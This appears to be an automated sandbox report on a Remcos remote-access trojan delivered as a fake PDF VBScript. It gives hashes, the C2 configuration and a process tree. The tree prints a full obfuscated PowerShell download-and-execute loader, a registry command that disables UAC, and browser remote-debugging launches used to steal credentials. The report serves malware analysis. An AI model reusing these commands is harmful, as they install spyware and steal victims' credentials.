Analysis

  • max time kernel
    299s
  • max time network
    275s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 17:33

General

  • Target

    ŽIADOSŤ O ROZPOČET 28.11.2024·pdf.vbs

  • Size

    33KB

  • MD5

    25a7df33e8fee89dfef3426080405533

  • SHA1

    3bb1b11f8b041a59a4e8c498c88bbeae17d5f182

  • SHA256

    9fc46e1dec1ebaa57e09e3a3d12cfc8b95653d6f26a754a0596d10b0ba9b3f1f

  • SHA512

    71fc9d9b64dce6f66941e63567c5eb89f57fb1e9caefbdb9fcd2eb1bb2bde1a98a4b156196b91f47834561a3178bb22665b513edb6b440bf313a39ae63f87b50

  • SSDEEP

    768:AxuasGxaSoM5LC3gWamt6iNi+ehBhZ+2JZ/q367gTeVVh0krL3uS:SuasQo2GZU+ehB/+WIQEmf0k3J

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

45hq459.duckdns.org:23458

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-ZP0CQ6

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ŽIADOSŤ O ROZPOČET 28.11.2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Refrnsangs='Crebrisulcate';;$Kilmarnock='Itonaman';;$Vegetoanimal189='Aurichalcite';;$Flirtable='Abnormalizing134';;$Fdeegn='Epalpate';;$Unestopped=$host.Name;function spiritusbestemmelsers($Toksiologi){If ($Unestopped) {$Laundromat255=4} for ($Giltheads211=$Laundromat255;;$Giltheads211+=5){if(!$Toksiologi[$Giltheads211]) { break }$Vasotripsy+=$Toksiologi[$Giltheads211]}$Vasotripsy}function strimlingernes($Giltheads211sdkkede){ .($Fasanhanen) ($Giltheads211sdkkede)}$Praedialist=spiritusbestemmelsers 'Opvan PorEbonat he .snepwcoxoebeepbRingCOverl Ur iSkadeCellNund T';$Talehrelrernes=spiritusbestemmelsers 'BureM Proo.mpuz PhyiM,sclErytl uneaTe,p/';$Compends=spiritusbestemmelsers 'P rfTCanolIndks ,to1 yde2';$Subornation='Shel[FangNHeare C.mtGr g.UtaksCol,eUddyRSupeV B siAposCKlateNewspau oo SljIOuthnDiomtSpgemDougaSlagNFa rA HasG,esueI serDepo]pleu: Slj:DicesLeakE ProCUranuKoncR S.niIndtT D cyVigepSvinrEmerOElwitMiscOTil.CEncooBuoylNull=Hemi$Udk CBib,obouim trbPIn ie urenMised FriS';$Talehrelrernes+=spiritusbestemmelsers 'Henf5K me.Kons0Con, Acho(WhitW ubsiKildn FledBrueoWithwkartsUnre ForhN PinTCorr le1Scap0 Nge.Bacu0For ;Raad ArrWPa iiMethnbetr6Unhe4Rect;Ranc HetexG.km6Turb4Vulc;Bedr fy,prAff.vWith:Opl.1F lm3Bigg1 le.Hypo0S lf)S in SeptGHar eSynacSenekRo eoMrk / uar2Anti0R ak1Waga0 sla0Unom1 ods0Asym1G,ow Ch yF MiriManvremuleChanfpurho ForxWis,/popu1 Lom3 cla1Lu a.idyl0';$Skraldgasvrkers=spiritusbestemmelsers 'FemkUundisUrt eSikkRCrop- TilaOverGWeirEFle.N.heiT';$Almuernes=spiritusbestemmelsers ' Exah ChotG tet Pa pErotsFang:Myel/ Dio/ fsmdBlemr Fari Pitv ReheAnko.CimbgAnsgoSvu o,ogrg ProlP taeDeni.BoffcMytho OldmOver/ VanuM.rfcChel? laseAlkyxPrevpBioeoUnv rAnestint,=D ald ilhoVidewLovonSvirlForpo HipaLovpdSvib& FreiAnt dgenh= d.f1 T iM Antu,hilkMassvAnsvy RefIPat R.harsS.trK BloqRootMSto,LBr d5zealN ktuwVelrqPi.kEtaurMTrapWSlagxAmbuQ SynE ompK T gCChok9Reciw kuf2 B p- EksjI eatReliqClomF';$etagevaskens=spiritusbestemmelsers 'Udhv>';$Fasanhanen=spiritusbestemmelsers 'TykkiSeedE Hi X';$Preluxurious='Bakkekams';$Matteuccia8='\Skyggeboksningerne.Cha';strimlingernes (spiritusbestemmelsers 'Iodo$KlemG TaklSympoHallbRa iABestlK mi: F,rcHudfa SamtIn.sNGnetA atac StaHFanee Co =F al$ DriEAku,nVelvv.onh:UnfeAUretpMe apBramD WagaFil tProfASev +Kaar$Id.oM LataSkifTFebetHa.me m,tU vdCDiskCBio,I IndAReno8');strimlingernes (spiritusbestemmelsers 'Mot,$ oncg lvel RafoO erbEu yA ZarLColu:Sc,wSadmiE ex rAgure Frsn LotiOmb.TAstrPIncaxIn.e=Saut$gobiAMaltlEvicMF lluHundeE hrr squnZemiEOpsos,utl. ntaSophepIm,rlLensiCalltDalb(Stan$OutsESka,T AntA S rGEuchERixdvWhita redsRaceK MaxER,diNStevSNonc)');strimlingernes (spiritusbestemmelsers $Subornation);$Almuernes=$Serenitpx[0];$Asphyxies=(spiritusbestemmelsers 'Mie $AntiGDukal No oVideB .lya Tr.LInsc: stebKeybaOr fgPolyEG rrpEg,luTakolLa iVHip EBr sRChevENonenMiseEB cu=Cu hNkeele vicwfokk-GrunoForsbtrs.jDybgEClanCVanltKong inteSLabbY.uppS galt O.gE agtmtvrt.Sten$BunipUdsaRN nsaEr.gePetiD.vleiSebaaOpmrL urbiSpilsToroT');strimlingernes ($Asphyxies);strimlingernes (spiritusbestemmelsers ' re$ .reBP anaEx gg WireForbpKirku toslM,ltvDobbeTraprCirke EmbnAmpheIndl.NoodHSpileLograFulldOverePararr fus Fa [Foss$q akSMonokU atrK plaGrupl dvedEngrg Tr.aInfos FarvtinnrKolok T eeBassrPlacsTang] aml=Omkl$Ens TSa oa B wl T ueDomah indrFanie Hesl BonrForbeunririnflnReple naps');$Traumatiseret=spiritusbestemmelsers ' for$ LufB Kroa hiigCau.eBurnpSparuGafnlReasv.rrieKo tr VkseFortn Akve G.n.MiniD ,akoIrr,w Gs nScholE heoAsseaspi d .alFTyraiNonvlConseSpol(Wife$DiscA ,jelRen,m ethu Es eBounrA alnSylvePhrysDama, Lr $ diopForrupayclGedetDefioUrennDat )';$pulton=$Catnache;strimlingernes (spiritusbestemmelsers ' Sto$N,niGVrdiLQuipoFugtbTaarAP.nfLVe,d:AnstLSa saSkremU osICoari StlndiapA SndeBeco= Rin( ForT iviESkifs agt Rhi- FolpSubfaAgnetVos H dic Raf$Af np SjauJam lz motPar.o.edeNSkif)');while (!$lamiinae) {strimlingernes (spiritusbestemmelsers ' arl$PostgmatrlH teoSuffbHel aIndilUltr:Sem O,olovB oreDaggrBub sStv u.ranmForksS,ol=Hipp$ C tFsiv oUndir ordbH rdrIncouIslagbas sPiges,rotk.ermaAnegtRak t omeLip nUdlu1 Dri3Afkr3') ;strimlingernes $Traumatiseret;strimlingernes (spiritusbestemmelsers ' ohoSAnvetLin.aSupeRdishtMeni-Mon.s AshL U,cEBygneReolpKont Coc4');strimlingernes (spiritusbestemmelsers 'Ant $ FriGGooiLHyldoSquibF ckAJernlB.nd:LaseLHoseAhyalm FatiSkari BreNBearAUrenE Pat=Hosp(SinuTSt aeRejns DraT Mas- disPDngeACoastStioH Ind Spor$DrawpUndsu,ndeL MiltAbonoJourNStor)') ;strimlingernes (spiritusbestemmelsers 'Besk$FreeGTo sLSluso oubbSqusaSnupLKa r:Autia F,rl,nogdBreaE RudaH,pe=Chau$FjedgKonflMiniOF ktB OveAMi uLCont:TrotPEastR Toro DrePDeliASatinVipsoBasulAze +Forb+Stra%E fa$HeadS .itESvesrLaboe AltnAveli PasTkunsPBortX T,p.compCBlowOUd euanglNBindt') ;$Almuernes=$Serenitpx[$Aldea]}$Elektromagnet=294112;$oplsende=30959;strimlingernes (spiritusbestemmelsers 'Prei$jon.G R,sLG adoleftBNudnA lanlbind:ArchF Pl oGrisLK.nski obEPlacRS.btI MahGClose ,il pr,p=Serb Draag.ingEstyrTOpfy-MelaCM nio RepNIndktBek.eEnd,N Hert Vej Ane$IndappolyUE.trlTilltPrimODu lN');strimlingernes (spiritusbestemmelsers 'Drag$ AppgNedrlB nkoAntibLerdaAr el Unf: SteItim nSammd .antLachrElenaFuldkti,g Ung=Smaa Dis[ SolSDendy isssRetstP roeFldnmunpe.micrCUnfioTonen Vr.vPrereMillrBreptFa c]Ciro:Gril:citrFHvisrUdkmoRetom CreB Me.aNatbsSupee Eth6Svig4 SeqS Fret owtrHormiTknin ForgUnte(J rd$bedsFSut oN.nplFilmk dleMiljrChi i Ma.g t nehon )');strimlingernes (spiritusbestemmelsers 'fd v$UnobGSyntlAssyOCe hBRefoaRe ul,ryp:Futci creNBristUncor EreoKonddB odUNonec,rest flyOOks,RD ssIPentNDobbEUnpesLettsAgam C r=Inso Cal[LinjsAto,y Snosoutrt ffeeRutimSeni.SnubtVapoEAminx Mu t yd.FilkeFortnIkenC U soEsotDHostiFyriNS iggOprr]T dd:Geob: utaIntes KraCBreviTol i A,o.LeggG.imneb.nkTAttaS S yt SemRMallI HydnVandGOpda(None$ KvaI Ch.NDecid orTKbesRTresaIdeeKFo.t)');strimlingernes (spiritusbestemmelsers ' ov$Samfgn mblP uso StrBS,sqA estLActi: emimP,thO adaREm,eFBer DG avR Ag.EL,gknPredESama=Fork$Sc nISkr NSequTRe,irPle,OU quDKl,bUFortc angtKarto umeRMrkei StenEastEOplgsPrimsKbma.KikksUltrUOphibParusUnretKo,drUd,aiKn.cNHvssGRean( Pro$SigtE DoslTli e FidkDerotIns rCaulOTriamRappaKajpGRealNBehieKontTScia,Slav$PaapoUnytpTaboLge nsDolieFashnBotrDIsvaECce )');strimlingernes $Morfdrene;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1400
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Refrnsangs='Crebrisulcate';;$Kilmarnock='Itonaman';;$Vegetoanimal189='Aurichalcite';;$Flirtable='Abnormalizing134';;$Fdeegn='Epalpate';;$Unestopped=$host.Name;function spiritusbestemmelsers($Toksiologi){If ($Unestopped) {$Laundromat255=4} for ($Giltheads211=$Laundromat255;;$Giltheads211+=5){if(!$Toksiologi[$Giltheads211]) { break }$Vasotripsy+=$Toksiologi[$Giltheads211]}$Vasotripsy}function strimlingernes($Giltheads211sdkkede){ .($Fasanhanen) ($Giltheads211sdkkede)}$Praedialist=spiritusbestemmelsers 'Opvan PorEbonat he .snepwcoxoebeepbRingCOverl Ur iSkadeCellNund T';$Talehrelrernes=spiritusbestemmelsers 'BureM Proo.mpuz PhyiM,sclErytl uneaTe,p/';$Compends=spiritusbestemmelsers 'P rfTCanolIndks ,to1 yde2';$Subornation='Shel[FangNHeare C.mtGr g.UtaksCol,eUddyRSupeV B siAposCKlateNewspau oo SljIOuthnDiomtSpgemDougaSlagNFa rA HasG,esueI serDepo]pleu: Slj:DicesLeakE ProCUranuKoncR S.niIndtT D cyVigepSvinrEmerOElwitMiscOTil.CEncooBuoylNull=Hemi$Udk CBib,obouim trbPIn ie urenMised FriS';$Talehrelrernes+=spiritusbestemmelsers 'Henf5K me.Kons0Con, Acho(WhitW ubsiKildn FledBrueoWithwkartsUnre ForhN PinTCorr le1Scap0 Nge.Bacu0For ;Raad ArrWPa iiMethnbetr6Unhe4Rect;Ranc HetexG.km6Turb4Vulc;Bedr fy,prAff.vWith:Opl.1F lm3Bigg1 le.Hypo0S lf)S in SeptGHar eSynacSenekRo eoMrk / uar2Anti0R ak1Waga0 sla0Unom1 ods0Asym1G,ow Ch yF MiriManvremuleChanfpurho ForxWis,/popu1 Lom3 cla1Lu a.idyl0';$Skraldgasvrkers=spiritusbestemmelsers 'FemkUundisUrt eSikkRCrop- TilaOverGWeirEFle.N.heiT';$Almuernes=spiritusbestemmelsers ' Exah ChotG tet Pa pErotsFang:Myel/ Dio/ fsmdBlemr Fari Pitv ReheAnko.CimbgAnsgoSvu o,ogrg ProlP taeDeni.BoffcMytho OldmOver/ VanuM.rfcChel? laseAlkyxPrevpBioeoUnv rAnestint,=D ald ilhoVidewLovonSvirlForpo HipaLovpdSvib& FreiAnt dgenh= d.f1 T iM Antu,hilkMassvAnsvy RefIPat R.harsS.trK BloqRootMSto,LBr d5zealN ktuwVelrqPi.kEtaurMTrapWSlagxAmbuQ SynE ompK T gCChok9Reciw kuf2 B p- EksjI eatReliqClomF';$etagevaskens=spiritusbestemmelsers 'Udhv>';$Fasanhanen=spiritusbestemmelsers 'TykkiSeedE Hi X';$Preluxurious='Bakkekams';$Matteuccia8='\Skyggeboksningerne.Cha';strimlingernes (spiritusbestemmelsers 'Iodo$KlemG TaklSympoHallbRa iABestlK mi: F,rcHudfa SamtIn.sNGnetA atac StaHFanee Co =F al$ DriEAku,nVelvv.onh:UnfeAUretpMe apBramD WagaFil tProfASev +Kaar$Id.oM LataSkifTFebetHa.me m,tU vdCDiskCBio,I IndAReno8');strimlingernes (spiritusbestemmelsers 'Mot,$ oncg lvel RafoO erbEu yA ZarLColu:Sc,wSadmiE ex rAgure Frsn LotiOmb.TAstrPIncaxIn.e=Saut$gobiAMaltlEvicMF lluHundeE hrr squnZemiEOpsos,utl. ntaSophepIm,rlLensiCalltDalb(Stan$OutsESka,T AntA S rGEuchERixdvWhita redsRaceK MaxER,diNStevSNonc)');strimlingernes (spiritusbestemmelsers $Subornation);$Almuernes=$Serenitpx[0];$Asphyxies=(spiritusbestemmelsers 'Mie $AntiGDukal No oVideB .lya Tr.LInsc: stebKeybaOr fgPolyEG rrpEg,luTakolLa iVHip EBr sRChevENonenMiseEB cu=Cu hNkeele vicwfokk-GrunoForsbtrs.jDybgEClanCVanltKong inteSLabbY.uppS galt O.gE agtmtvrt.Sten$BunipUdsaRN nsaEr.gePetiD.vleiSebaaOpmrL urbiSpilsToroT');strimlingernes ($Asphyxies);strimlingernes (spiritusbestemmelsers ' re$ .reBP anaEx gg WireForbpKirku toslM,ltvDobbeTraprCirke EmbnAmpheIndl.NoodHSpileLograFulldOverePararr fus Fa [Foss$q akSMonokU atrK plaGrupl dvedEngrg Tr.aInfos FarvtinnrKolok T eeBassrPlacsTang] aml=Omkl$Ens TSa oa B wl T ueDomah indrFanie Hesl BonrForbeunririnflnReple naps');$Traumatiseret=spiritusbestemmelsers ' for$ LufB Kroa hiigCau.eBurnpSparuGafnlReasv.rrieKo tr VkseFortn Akve G.n.MiniD ,akoIrr,w Gs nScholE heoAsseaspi d .alFTyraiNonvlConseSpol(Wife$DiscA ,jelRen,m ethu Es eBounrA alnSylvePhrysDama, Lr $ diopForrupayclGedetDefioUrennDat )';$pulton=$Catnache;strimlingernes (spiritusbestemmelsers ' Sto$N,niGVrdiLQuipoFugtbTaarAP.nfLVe,d:AnstLSa saSkremU osICoari StlndiapA SndeBeco= Rin( ForT iviESkifs agt Rhi- FolpSubfaAgnetVos H dic Raf$Af np SjauJam lz motPar.o.edeNSkif)');while (!$lamiinae) {strimlingernes (spiritusbestemmelsers ' arl$PostgmatrlH teoSuffbHel aIndilUltr:Sem O,olovB oreDaggrBub sStv u.ranmForksS,ol=Hipp$ C tFsiv oUndir ordbH rdrIncouIslagbas sPiges,rotk.ermaAnegtRak t omeLip nUdlu1 Dri3Afkr3') ;strimlingernes $Traumatiseret;strimlingernes (spiritusbestemmelsers ' ohoSAnvetLin.aSupeRdishtMeni-Mon.s AshL U,cEBygneReolpKont Coc4');strimlingernes (spiritusbestemmelsers 'Ant $ FriGGooiLHyldoSquibF ckAJernlB.nd:LaseLHoseAhyalm FatiSkari BreNBearAUrenE Pat=Hosp(SinuTSt aeRejns DraT Mas- disPDngeACoastStioH Ind Spor$DrawpUndsu,ndeL MiltAbonoJourNStor)') ;strimlingernes (spiritusbestemmelsers 'Besk$FreeGTo sLSluso oubbSqusaSnupLKa r:Autia F,rl,nogdBreaE RudaH,pe=Chau$FjedgKonflMiniOF ktB OveAMi uLCont:TrotPEastR Toro DrePDeliASatinVipsoBasulAze +Forb+Stra%E fa$HeadS .itESvesrLaboe AltnAveli PasTkunsPBortX T,p.compCBlowOUd euanglNBindt') ;$Almuernes=$Serenitpx[$Aldea]}$Elektromagnet=294112;$oplsende=30959;strimlingernes (spiritusbestemmelsers 'Prei$jon.G R,sLG adoleftBNudnA lanlbind:ArchF Pl oGrisLK.nski obEPlacRS.btI MahGClose ,il pr,p=Serb Draag.ingEstyrTOpfy-MelaCM nio RepNIndktBek.eEnd,N Hert Vej Ane$IndappolyUE.trlTilltPrimODu lN');strimlingernes (spiritusbestemmelsers 'Drag$ AppgNedrlB nkoAntibLerdaAr el Unf: SteItim nSammd .antLachrElenaFuldkti,g Ung=Smaa Dis[ SolSDendy isssRetstP roeFldnmunpe.micrCUnfioTonen Vr.vPrereMillrBreptFa c]Ciro:Gril:citrFHvisrUdkmoRetom CreB Me.aNatbsSupee Eth6Svig4 SeqS Fret owtrHormiTknin ForgUnte(J rd$bedsFSut oN.nplFilmk dleMiljrChi i Ma.g t nehon )');strimlingernes (spiritusbestemmelsers 'fd v$UnobGSyntlAssyOCe hBRefoaRe ul,ryp:Futci creNBristUncor EreoKonddB odUNonec,rest flyOOks,RD ssIPentNDobbEUnpesLettsAgam C r=Inso Cal[LinjsAto,y Snosoutrt ffeeRutimSeni.SnubtVapoEAminx Mu t yd.FilkeFortnIkenC U soEsotDHostiFyriNS iggOprr]T dd:Geob: utaIntes KraCBreviTol i A,o.LeggG.imneb.nkTAttaS S yt SemRMallI HydnVandGOpda(None$ KvaI Ch.NDecid orTKbesRTresaIdeeKFo.t)');strimlingernes (spiritusbestemmelsers ' ov$Samfgn mblP uso StrBS,sqA estLActi: emimP,thO adaREm,eFBer DG avR Ag.EL,gknPredESama=Fork$Sc nISkr NSequTRe,irPle,OU quDKl,bUFortc angtKarto umeRMrkei StenEastEOplgsPrimsKbma.KikksUltrUOphibParusUnretKo,drUd,aiKn.cNHvssGRean( Pro$SigtE DoslTli e FidkDerotIns rCaulOTriamRappaKajpGRealNBehieKontTScia,Slav$PaapoUnytpTaboLge nsDolieFashnBotrDIsvaECce )');strimlingernes $Morfdrene;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4576
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2428
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3688
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3016
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8076acc40,0x7ff8076acc4c,0x7ff8076acc58
          4⤵
            PID:3084
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1900,i,17907980519081105316,9927586951622200162,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1896 /prefetch:2
            4⤵
              PID:2764
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,17907980519081105316,9927586951622200162,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:3
              4⤵
                PID:1956
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,17907980519081105316,9927586951622200162,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2244 /prefetch:8
                4⤵
                  PID:928
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,17907980519081105316,9927586951622200162,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:3604
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,17907980519081105316,9927586951622200162,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:544
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4612,i,17907980519081105316,9927586951622200162,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:4692
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ozmaq"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4404
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ybztqrgf"
                3⤵
                  PID:736
                • C:\Windows\SysWOW64\msiexec.exe
                  C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ybztqrgf"
                  3⤵
                    PID:4980
                  • C:\Windows\SysWOW64\msiexec.exe
                    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ybztqrgf"
                    3⤵
                      PID:2016
                    • C:\Windows\SysWOW64\msiexec.exe
                      C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ybztqrgf"
                      3⤵
                      • Accesses Microsoft Outlook accounts
                      • System Location Discovery: System Language Discovery
                      PID:1576
                    • C:\Windows\SysWOW64\msiexec.exe
                      C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jvedrbrhxeaq"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4680
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                      3⤵
                      • Uses browser remote debugging
                      • Enumerates system info in registry
                      • Modifies registry class
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of FindShellTrayWindow
                      PID:4340
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8074a46f8,0x7ff8074a4708,0x7ff8074a4718
                        4⤵
                          PID:3508
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,3920163719518328219,985520558152504350,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
                          4⤵
                            PID:3608
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
